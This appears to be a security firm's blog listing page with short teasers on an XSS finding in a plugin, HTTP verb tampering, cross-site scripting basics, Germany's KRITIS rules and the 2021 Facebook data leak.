Recently, we discovered a cross-site scripting vulnerability during a penetration test, which was only made possible using a third-party plugin. What was surprising: the vulnerability seemed to occur only when the website used a specific language. As a result, we took a closer look.
HTTP Verb Tampering
When testing web applications for security flaws, the applications’ handling of different HTTP request methods – also known as verbs – should be considered.Usually, interactions between clients and servers utilize the HTTP methods GET or POST for accessing resources.
Cross Site Scripting
From a high level, cross site scripting (short: XSS) can be described as the embedding of foreign code into a trusted context for execution.
What is KRITIS and who does it affect?
In Germany, special regulations apply to operators of critical infrastructures under the Federal Office for Information Security / Bundesamt für Sicherheit in der Informationstechnik (BSI) Act. But who counts as an operator and when are infrastructures classified as critical?
Password leaks and how to deal with them
At the beginning of April 2021, information was published that personal data of more than 500 million Facebook users had surfaced in a hacking forum.